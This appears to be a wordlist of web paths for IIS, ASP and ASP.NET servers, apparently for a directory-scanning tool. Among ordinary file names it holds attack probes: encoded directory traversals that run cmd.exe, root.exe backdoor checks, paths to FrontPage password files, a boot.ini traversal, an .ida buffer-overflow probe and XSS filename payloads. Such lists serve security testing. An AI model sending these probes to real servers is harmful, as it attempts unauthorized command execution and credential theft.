%NETHOOD%/
..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
.printer
1_0_2204
1_0_2204/
1_0_2204_21/
1_0_2914
1_0_2914/
1_0_2914_0
1_0_2914_0/
1_0_3705
1_0_3705/
1_0_3705_0
1_0_3705_0/
1_0_3705_209
1_0_3705_209/
1_0_3705_288
1_0_3705_288/
1_0_3705_6018
1_0_3705_6018/
1_1_4322
1_1_4322 /
1_1_4322/
1_1_4322_2032
1_1_4322_2032/
1_1_4322_2300
1_1_4322_2300/
1_1_4322_2310
1_1_4322_2310/
1_1_4322_2407
1_1_4322_2407/
1_1_4322_2443
1_1_4322_2443/
1_1_4322_510
1_1_4322_510/
1_1_4322_573
1_1_4322_573/
2_0_40607
2_0_40607/
2_0_40607_16
2_0_40607_16/
2_0_50215
2_0_50215/
2_0_50215_44
2_0_50215_44/
2_0_50727
2_0_50727/
2_0_50727_1433
2_0_50727_1433/
2_0_50727_1434
2_0_50727_1434/
2_0_50727_3053
2_0_50727_3053/
2_0_50727_3082
2_0_50727_3082/
2_0_50727_312
2_0_50727_312/
2_0_50727_3603
2_0_50727_3603/
2_0_50727_3607
2_0_50727_3607/
2_0_50727_3615
2_0_50727_3615/
2_0_50727_4016
2_0_50727_4016 /
2_0_50727_42
2_0_50727_42/
2_0_50727_4918
2_0_50727_4918/
2_0_50727_4927
2_0_50727_4927/
2_0_50727_4952
2_0_50727_4952/
2_0_50727_832
2_0_50727_832/
3_0_4506
3_0_4506/
3_0_4506_2123
3_0_4506_2123/
3_0_4506_2254
3_0_4506_2254/
3_0_4506_26
3_0_4506_26/
3_0_4506_30
3_0_4506_30/
3_0_4506_590
3_0_4506_590/
3_0_4506_648
3_0_4506_648/
3_5_20404
3_5_20404/
3_5_20404_0
3_5_20404_0/
3_5_20706
3_5_20706/
3_5_20706_1
3_5_20706_1/
3_5_21022
3_5_21022/
3_5_21022_8
3_5_21022_8/
3_5_30428
3_5_30428/
3_5_30428_1
3_5_30428_1/
3_5_30729
3_5_30729/
3_5_30729_01
3_5_30729_01/
3_5_30729_4926
3_5_30729_4926/
404.asp
404.aspx
4_0_20506
4_0_20506/
4_0_21006
4_0_21006/
4_0_30128
4_0_30128/
4_0_30128_1
4_0_30128_1/
4_0_30319
4_0_30319 /
4_0_30319/
4_0_30319_1
4_0_30319_1/
4_0_30319_17020
4_0_30319_17020/
4_0_30319_17379
4_0_30319_17379/
4_0_30319_17626
4_0_30319_17626/
4_0_30319_17929
4_0_30319_17929/
4_5_40805
4_5_40805/
4_5_50131
4_5_50131/
4_5_50501
4_5_50501/
4_5_50709
4_5_50709/
<script>alert('XSS')</script>.aspx
_AuthChangeUrl?
_common.asp
_fpclass/
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_mem_bin
_mem_bin/
_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_mem_bin/autoconfig.asp
_mem_bin/formslogin.asp
_private
_private/
_vti_adm
_vti_adm/
_vti_aut
_vti_aut/
_vti_bin
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?1234=X
_vti_bin/fpcount.exe?Page=default.asp|Image=3
_vti_bin/shtml.dll
_vti_bin/shtml.dll/asdfghjkl
_vti_bin/shtml.exe/qwertyuiop
_vti_cnf
_vti_cnf/
_vti_log
_vti_log/
_vti_pvt
_vti_pvt/
_vti_pvt/administrator.pwd
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/shtml.exe
_vti_pvt/users.pwd
_vti_script
_vti_script/
_vti_txt
_vti_txt/
_WEB_INF/
a%5c.aspx
about.asp
About.aspx
aboutme.asp
AccessDenied.aspx
AccessPlatform/
AccessPlatform/auth/
AccessPlatform/auth/clientscripts/
AccessPlatform/auth/clientscripts/cookies.js
AccessPlatform/auth/clientscripts/login.js
AccessTopic.asp
Account.aspx
action.asp
activate.asp
Active.aspx
AdAdmin.asp
Adadmin_Save.asp
add.asp
Add.aspx
add2.asp
Add_entry.aspx
add_user.asp
Add_Vote.asp
addfile.asp
addnews.asp
Address.asp
AddUser.aspx
admin.asp
admin.aspx
admin/
Admin/knowledge/dsmgr/users/GroupManager.asp
Admin/knowledge/dsmgr/users/UserManager.asp
admin_admin.asp
admin_art.asp
admin_batch.asp
admin_boardset.asp
admin_canmou.asp
admin_cgglzn.asp
admin_chengguo.asp
admin_cmzz.asp
admin_config.asp
admin_copyright.asp
Admin_Decode.asp
Admin_Default.asp
admin_diary.asp
admin_dj.asp
admin_down.asp
admin_duiwu.asp
admin_flash.asp
admin_flashdel.asp
admin_flashedit.asp
admin_gonggao.asp
admin_jhdown.asp
admin_jhglzn.asp
admin_jiaoxue.asp
admin_jihua.asp
admin_js.asp
admin_keji.asp
admin_left.asp
admin_link.asp
Admin_list.asp
admin_lockuser.asp
Admin_Login.asp
Admin_Menu.asp
Admin_ModiPwd.asp
admin_neibu.asp
admin_news.asp
admin_other.asp
admin_pic.asp
admin_postings.asp
Admin_Private.asp
admin_save.asp
Admin_Style.asp
admin_upfile.asp
admin_upload.asp
Admin_UploadFile.asp
admin_user.asp
admin_view.asp
admin_viewok.asp
admin_vote.asp
admin_web.asp
admin_weiyuanhui.asp
admin_xiangmu.asp
admin_xmglzn.asp
admin_xsglzn.asp
admin_xuebao.asp
admin_xueshu.asp
admin_zhengzhi.asp
admin_zhidu.asp
admin_zhiliang.asp
admin_zlglzn.asp
administrador.asp
administration
administration/
administrator/
adminLogin.aspx
AdminMenu.asp
adovbs.inc
adsamples
adsamples/
AdvWorks/equipment/catalog_type.asp
ajfhasdfgsagfakjhgd
AllDel.asp
announce.asp
announcements.asp
Api_Config.asp
app.aspx
archive.aspx
archiv~1
archiv~1/
archi~1/
Archi~1/
array.asp
article.asp
Article.aspx
articles.asp
asp
asp/
aspcheck.asp
aspnet_client
aspnet_client/
aspnet_files/
asps
asps/
ASPSamp/AdvWorks/equipment/catalog_type.asp
asptemplate.asp
Atendimento.asp
BadWord.asp
base.asp
base64.asp
basexml.asp
basics.asp
BbsFace.asp
bin
bin/
bins
bins/
blank.asp
Blog.aspx
Blogroll.aspx
Blogs.aspx
bmjj.asp
Board.asp
Boardhelp.asp
boardpermission.asp
BoardSetting.asp
boardstat.asp
BoardUnite.asp
Boke.asp
BokeAdmin.asp
BokeApply.asp
BokeDescription.asp
BokeIndex.asp
BokeManage.asp
Bokepostings.asp
BokeRss.asp
BokeSearch.asp
BokeUpload.asp
Book_info.aspx
bookInfo.aspx
BookItemsAdmin.aspx
bottom.asp
Bugs.aspx
Buy.aspx
BuyPost.asp
cache.asp
calendar.asp
Captcha.asp
Catalog.aspx
Categories.aspx
category.asp
Category.aspx
CategoryAdmin.aspx
CategoryDAO.asp
certcontrol/
certenroll/
certsrv/
cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
CFIDE/Administrator/startstop.html
cggl.asp
cgglzn.asp
cgi
cgi-bin
cgi-bin/
cgi-bin/a1stats/a1disp.cgi
cgi-bin/htimage.exe?2,2
cgi-bin/htmlscript
cgi-bin/imagemap.exe?2,2
cgi/
Challenge.asp
Chan_Const.asp
change_pass.asp
ChangePassword.asp
ChangePassword.aspx
ChangePasswordSuccess.aspx
ChangePwd.aspx
char.asp
chat.asp
check.asp
checkapache.html
checkcode.asp
CheckInput.asp
checklogin.asp
Checkout.aspx
chkinput.asp
ChkLogin.asp
citrix/
Citrix//AccessPlatform/auth/clientscripts/cookies.js
citrix/AccessPlatform/auth/
citrix/AccessPlatform/auth/clientscripts/
Citrix/AccessPlatform/auth/clientscripts/login.js
Citrix/PNAgent/config.xml
class.asp
class_upload.asp
ClearCache.asp
clocktower
cls_article.asp
Cls_DvApi.asp
Cls_Main.asp
Cls_System.asp
clsUpload.asp
cmsample
cmsample/
code.asp
ColorPicker.aspx
commands.asp
comment.asp
Comment.aspx
Comments.aspx
common
common.asp
common/
common~1
common~1/
config.asp
Confirm.aspx
Confirmation.aspx
Conn.asp
conn1.asp
ConnBook.asp
ConnDB.asp
connection.asp
connector.asp
connector.aspx
ConnJobs.asp
ConnNew.asp
ConnNews.asp
ConnOther.asp
ConnProdu.asp
Conntaolun.asp
Connwl.asp
const.asp
contact.asp
Contact.aspx
ContactUs.aspx
Content.aspx
control.asp
ControlPanel.aspx
Controls.aspx
cookies.asp
copyright.asp
core.asp
countvote.asp
Create.aspx
CreateAccount.aspx
CreateUser.aspx
CreateVirtualServer.aspx
CS_ClassTemplate.aspx
CS_DynamicScaffold.aspx
CS_GeneratedScaffoldCodeBehind.aspx
CS_GeneratedScaffoldMarkup.aspx
CS_ODSController.aspx
CS_SPTemplate.aspx
CS_StructsTemplate.aspx
CS_ViewTemplate.aspx
CSS.asp
daima.asp
Dashboard.aspx
Data.asp
Data.aspx
date.asp
db
db.asp
db/
debug.asp
DeCode.asp
default.asp
Default.aspx
Default2.aspx
del.asp
del_user.asp
delete.asp
Delete.aspx
Deleted.aspx
delvote.asp
demo.asp
Detail.aspx
Details.aspx
dir.inc.asp
dispbbs.asp
Display.aspx
dispuser.asp
doc_add.asp
document.asp
domcfg.nsf/?open
down.asp
download.asp
download.aspx
DownloadFile.aspx
downloadlist.asp
DrawMagicFace.asp
duiwu.asp
Dv_ClsMain.asp
Dv_ClsOther.asp
dv_dpo.asp
Dv_GetCode.asp
Dv_News.asp
Dv_News_Demo.asp
Dv_NewsView.asp
Dv_ubbcode.asp
dzbl_del.asp
dzbl_List.asp
easp.asp
edit.asp
Edit.aspx
edit_user.asp
EditEvent.aspx
EditGalleries.aspx
EditImage.aspx
Editor.aspx
EditProfile.aspx
EditUser.aspx
EditVersion.aspx
Email.asp
Email_Cls.asp
email_word.asp
en.asp
eokedit.asp
eokedit1.asp
error.asp
Error.aspx
error404.aspx
ErrorPage.aspx
errors.asp
ErrorsGridView.aspx
ErrorsRssView.aspx
eWebEditor.asp
Exadmin/
example.asp
Exchange/
exchange/root.asp
ExchWeb/
Exit.asp
export.asp
Export.aspx
FAQ.aspx
favlist.asp
fckeditor.asp
feed.asp
Feed.aspx
file.asp
file_add_db.asp
File_Admin_AddNew.asp
File_Admin_List.asp
File_Admin_Modify.asp
File_Admin_Modify_save.asp
File_Admin_News_Del.asp
FileManager.aspx
fileshow.asp
FileUpload.aspx
FillNode.aspx
flash.asp
flash_play.asp
Foot.asp
footer.asp
forgot_password.asp
ForgotPassword.aspx
form.asp
Form.aspx
FORMAT.asp
forum.asp
Forum.aspx
forum_arc.asp
forum_professionnel.asp
ForumAds.asp
ForumNewsSetting.asp
ForumPay.asp
Forums.aspx
fpdf.asp
fpsample
fpsample/
FreeASPUpload.asp
friend.asp
friendlist.asp
Friends.aspx
ftb.imagegallery.aspx
func.asp
function.asp
functions.asp
Gallery.aspx
gbook.asp
gdAdmin.asp
gdadmin_Save.asp
Generate.aspx
get.asp
GetChallengeWord.asp
GetCode.asp
ggnews.asp
glml.asp
Global.asp
glxz.asp
glzn.asp
gonggao.asp
grade.asp
Group.asp
GroupPermission.asp
Groups.aspx
guestbook.asp
gywm_Modify.asp
gywm_Modify_Save.asp
head.asp
header.asp
help
Help.asp
Help.aspx
help/
HelpRaw.aspx
helpview.asp
history.aspx
Home.aspx
IDWindow.aspx
iiasdmpwd/
iisadmin
iisadmin/
iisadmpwd
iisadmpwd/
iisadmpwd/achg.htr
iisadmpwd/aexp.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
iisadmpwd/anot.htr
iisadmpwd/anot3.htr
iishelp
iishelp/
iishelp/iis/misc/default.asp
iissamples
iissamples/
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Codebrws.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/CodeBrws.asp
ImageGallery.aspx
images
images.asp
images/
img.asp
imgnews.asp
imprimer.asp
inc.asp
inc_config.asp
inc_connection.asp
inc_header.asp
inc_ilanlar.asp
inc_language.asp
include.asp
includes/adovbs.inc
index.asp
Index.aspx
index.php
index.shtml
index1.asp
indexnew.asp
inetpub
inetpub/
inetsrv
inetsrv/
Info.asp
Info.aspx
InfoList.asp
Init.asp
Inscription.aspx
insert.asp
insidelist.asp
insidenews.asp
install.asp
install.aspx
interface.asp
io.asp
isapi
isapi/
item.asp
Item.aspx
Items.aspx
jgjs.asp
jhgl.asp
jhglzn.asp
Job.asp
JobAdmin.asp
Jobs.aspx
JobsAdmin_AboutUs.asp
JobsAdmin_AboutUs_Save.asp
JobsAdmin_Job.asp
JobsAdmin_Job_Del.asp
JobsAdmin_Job_Modify.asp
JobsAdmin_Job_Publish.asp
JobsAdmin_Job_Save.asp
JobsAdmin_Job_Update.asp
JobsAdmin_Person.asp
JobsAdmin_Person_Del.asp
JobsAdmin_Person_Info.asp
JoinVipGroup.asp
JSON.asp
JSON_2.0.2.asp
JSON_UTIL_0.1.1.asp
jsonParser.asp
jsonRpcServer.asp
jxnews.asp
jxpj.asp
KeepAlive.aspx
Keywords.asp
keywords.aspx
Label.asp
language.asp
left.asp
left1.asp
left2.asp
left3.asp
left4.asp
left5.asp
Link.asp
links.asp
Links.aspx
list.asp
List.aspx
liuyan_Del.asp
liuyan_Del_en.asp
liuyan_List.asp
liuyan_List_en.asp
liuyan_show.asp
liuyan_show_en.asp
liwei.asp
LoadIndexKeywords.aspx
Loadservoces.asp
loadtree.asp
loadtree1.asp
location.asp
LockIP.asp
Log.asp
Log.aspx
login.asp
Login.aspx
LogOff.asp
Logoff.aspx
LogOn.aspx
logout.asp
Logout.aspx
lostpass.asp
lyCode.asp
Mail.aspx
Mail/smtp/Admin/smadv.asp
main.asp
Main.aspx
MainFeed.aspx
manage.asp
manage_user.asp
ManageUsers.aspx
market
math.asp
md5.asp
mdb.asp
member.asp
menu.asp
Menu.aspx
Message.asp
Message.aspx
Messages.aspx
messanger.asp
Microsoft-Server-ActiveSync/
Micros~1
Micros~1/
mmAdmin.asp
Mod_admin.asp
Mod_Vote.asp
modifyadd.asp
modifypic.asp
modifypic_news.asp
modifypic_produ.asp
modifyprodupic.asp
Modules.aspx
MoneyLog.asp
monitor.asp
Move.aspx
movebloc.asp
msadc
msadc/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/Samples/selector/showcode.asp
msdac/root.exe?/c+dir
mspress30
music.asp
myadmin.asp
myfile.asp
mymodify.asp
MyPage.aspx
Myplus.asp
MyProfile.aspx
myspace.asp
Navigation.aspx
New.aspx
newadmin.asp
newadmin_addnew.asp
newadmin_addnew_save.asp
newadmin_list.asp
NewAdmin_Modify.asp
NewAdmin_Modify_Save.asp
NewAdmin_New_Del.asp
newpass.asp
news.asp
News.aspx
NewsAdmin.asp
NewsAdmin_AddNew.asp
NewsAdmin_AddNew_Save.asp
NewsAdmin_AddType.asp
NewsAdmin_DelType.asp
NewsAdmin_Home.asp
NewsAdmin_Home_Doing.asp
NewsAdmin_Home_Modify.asp
NewsAdmin_Home_Pic.asp
NewsAdmin_HomeAdd.asp
NewsAdmin_HomeAdd_Save.asp
NewsAdmin_HomeModify_Save.asp
NewsAdmin_List.asp
NewsAdmin_Modify.asp
NewsAdmin_Modify1.asp
NewsAdmin_Modify_Save.asp
NewsAdmin_News_Del.asp
NewsAdmin_Type.asp
NewsList.aspx
newsshow.asp
NewUser.aspx
NotAuthorised.aspx
Notes.aspx
NotFound.aspx
Notice.aspx
null.htw
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
OMA/
online.asp
Options.aspx
oracle.asp
Order.aspx
orderDetail.aspx
OrderDetails.aspx
OrderList.aspx
Orders.aspx
OtherAdmin.asp
out.asp
OWA/
page.asp
Page.aspx
Pages.aspx
PageView.aspx
passport.asp
PasswordAdmin.asp
Passwordadmin_Save.asp
pay_boardlimited.asp
Payment.aspx
pbserver
pbserver/
pbserver/pbserver.dll
Person.aspx
PhotoList.aspx
pic.asp
pic_List.asp
pic_List1.asp
PingServices.aspx
pinyin.asp
Plus.asp
plus_check.asp
plus_MagicFace_const.asp
plus_Tools_Center.asp
plus_Tools_const.asp
Plus_Tools_Info.asp
plus_Tools_InfoSetting.asp
Plus_Tools_Magicface.asp
plus_Tools_Magiclist.asp
plus_Tools_pay.asp
plus_Tools_postings.asp
Plus_Tools_User.asp
PollAdmin.asp
PollAdmin_add.asp
PollAdmin_admin.asp
PollAdmin_delete.asp
PollAdmin_display.asp
PopUp.asp
post.asp
Post.aspx
post_upload.asp
PostCls.asp
PostData.asp
postinfo.html
Posts.aspx
Preferences.aspx
preview.asp
printers
printers/
private.asp
ProduAdmin.asp
produAdmin_AddNew.asp
produAdmin_AddNew_Save.asp
ProduAdmin_Addpinpai.asp
ProduAdmin_AddProdu.asp
ProduAdmin_AddType.asp
ProduAdmin_childpinpai.asp
ProduAdmin_childpinpaiSave.asp
ProduAdmin_childSave.asp
ProduAdmin_childtype.asp
ProduAdmin_daType.asp
ProduAdmin_DelOrder.asp
ProduAdmin_Delpinpai.asp
ProduAdmin_DelProdu.asp
ProduAdmin_DelType.asp
produAdmin_List.asp
produAdmin_Modify.asp
ProduAdmin_Modify_Save.asp
ProduAdmin_NewProdu.asp
produAdmin_News_Del.asp
ProduAdmin_Order.asp
ProduAdmin_Order_See.asp
ProduAdmin_pinpai.asp
ProduAdmin_PubProdu.asp
ProduAdmin_Type.asp
ProduAdmin_xiaoType.asp
product.asp
Product.aspx
products.aspx
Profile.asp
Profile.aspx
Profiles.aspx
progra~1
Progra~1
progra~1/
Project.aspx
Projects.aspx
PropertyList.aspx
PubAdmin.asp
Pubadmin_Save.asp
Public/
Publish.aspx
publisher
query.asp
Query.aspx
Query_get.asp
qwertypoiu.htw
qwertypoiu.printer
Receive.asp
recherche.aspx
Record.asp
recycle.asp
Redirect.aspx
referrers.aspx
reg.asp
reg_upload.asp
register.asp
Register.aspx
Registration.aspx
Releases.aspx
ReloadForumCache.asp
reply.asp
Report.aspx
Reports.aspx
Reserve.aspx
Reset.asp
ResetPassword.aspx
result.asp
Results.aspx
right.asp
Room.aspx
RoomManager.aspx
rss.asp
RSS.aspx
RssFeed.asp
rubrique.asp
sample.aspx
sample01.asp
sample02.asp
sample03.asp
sample04.asp
sampleposteddata.asp
samples
samples/
save.asp
Save.aspx
saveadmin.asp
Saved.aspx
savepost.asp
savevote.asp
SayAdmin.asp
SayAdmin_Del.asp
ScheduleSlot.aspx
scode.asp
scripts
scripts /
scripts/
scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
scripts/cgimail.exe
scripts/convert.bas
scripts/counter.exe
scripts/fpcount.exe
scripts/iisadmin/ism.dll?http/dir
scripts/no-such-file.pl
scripts/root.exe?/c+dir
scripts/samples
scripts/samples/
scripts/samples/search/webhits.exe
scripts/tools
scripts/tools/
scripts/tools/getdrvs.exe
scripts/tools/newdsn.exe
search.asp
Search.aspx
search?NS-query-pat=..\..\..\..\..\boot.ini
SearchHelp.aspx
SearchResults.aspx
Security.aspx
selimage.asp
Send.asp
Send.aspx
SendEmail.asp
sendmail.asp
service.asp
services.aspx
session.asp
Setting.asp
settings.asp
Settings.aspx
setup.asp
Setup.aspx
SetupVS.aspx
sha1.asp
shangchuan.asp
share/
Shipping.aspx
shopping_cart.aspx
ShoppingCart.aspx
show.asp
Show.aspx
showall.asp
ShowcontentPic.asp
showerr.asp
ShowHeadPic.asp
ShowImg.asp
ShowNewsPic.asp
ShowNewsPic1.asp
ShowpinpaiPic.asp
ShowpinpaiPic1.asp
ShowProduPic.asp
showvote.asp
showvote111.asp
showvotedetails1.asp
ShowyingpinPic.asp
SignIn.aspx
Site.aspx
sitemap.asp
SiteMap.aspx
sites
sites/
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
siteserver
siteserver/
SiteServer/Admin
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
siteserver/publishing/viewcode.asp
SiteServer/Publishing/viewcode.asp
SiteSettingsEdit.aspx
SiteSettingsList.aspx
smiley.asp
soft.asp
sql.asp
Start.aspx
Startup.asp
stat.asp
Statistics.aspx
stats.asp
Status.asp
step1.asp
string.asp
StudentResult.aspx
StudyResult.aspx
stylesheet.aspx
sysset.asp
system
System.asp
system/
system_web
system_web/
sysuser.asp
Tables.aspx
tabs.aspx
tag.asp
Tag.aspx
TagMiniView.aspx
tags.asp
Tasks.aspx
techlist.asp
technews.asp
Template.asp
Templates.aspx
templates_view.asp
test.asp
test.aspx
test/
TestValidatonControls.aspx
textbox.asp
textbox_jj.asp
textbox_news.asp
textbox_produ.asp
ThankYou.aspx
tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
top.asp
Top.aspx
top1.asp
Top_admin.asp
topic.asp
TopicOther.asp
track.asp
tsweb/
ubb.asp
ubbcode.asp
Ubblist.asp
ubbshow.asp
UnitTests.aspx
Update.asp
Update.aspx
Update_User.asp
Updater.aspx
upfile.asp
upfile_class.asp
upfile_lx.asp
upfile_xx.asp
UpImg.asp
upload.asp
upload.aspx
upload_5xsoft.asp
upload_5xsoft.inc.asp
Upload_Class.asp
upload_lx.asp
upload_xx.asp
uploader.asp
UpLoadFile.aspx
UpLoadList.asp
UploadProperty.aspx
UpUserFace.asp
user.asp
user_info.asp
user_shenhe.asp
useraccount.aspx
userinfo.asp
userlist.asp
UserList.aspx
userManage.aspx
UserManagement.aspx
usermanager.asp
UserPay.asp
UserProfile.aspx
userregmanager.asp
UserRoleEdit.aspx
UserRoleList.aspx
UserRoles.aspx
Users.aspx
usersms.asp
utf-8.asp
utf8.asp
util.asp
vc30
Version.asp
view.asp
View.aspx
ViewAll.aspx
viewer.aspx
viewfile.asp
ViewInfo.asp
ViewPage1.aspx
viewsavebody.asp
VirtualServer.aspx
vote.asp
Vote.aspx
vote_function.asp
Vote_List.asp
vote_save.asp
vote_showcode.asp
voteadd.asp
votedel.asp
votedy.asp
votelist.asp
votemodify.asp
votesave.asp
votetou.asp
wap.asp
wdxz.asp
Wealth.asp
web
WEB-INF/web.xml
Web.config
web/
WebForm1.aspx
webpub
webpub/
WebSer~1
WebSer~1/
welcome.asp
WidgetEditor.aspx
winnt
winnt/
wwwroot
wwwroot/
wwwroot/1_0_2204_21
wzgg_Modify.asp
wzgg_Modify_Save.asp
x.cfm
x.htw
x.htx
x.ida
x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
x.idc
x.idq
x.pl
x.shtml
xbgl.asp
xbnews.asp
xg.asp
xgadmin.asp
xmgl.asp
xmglzn.asp
xml.asp
xsgl.asp
xsglzn.asp
xsnews.asp
xswyh.asp
zhengzhi.asp
zhidu.asp
zlgl.asp
zlglzn.asp
~/<script>alert('XSS')</script>.asp
~/<script>alert('XSS')</script>.aspx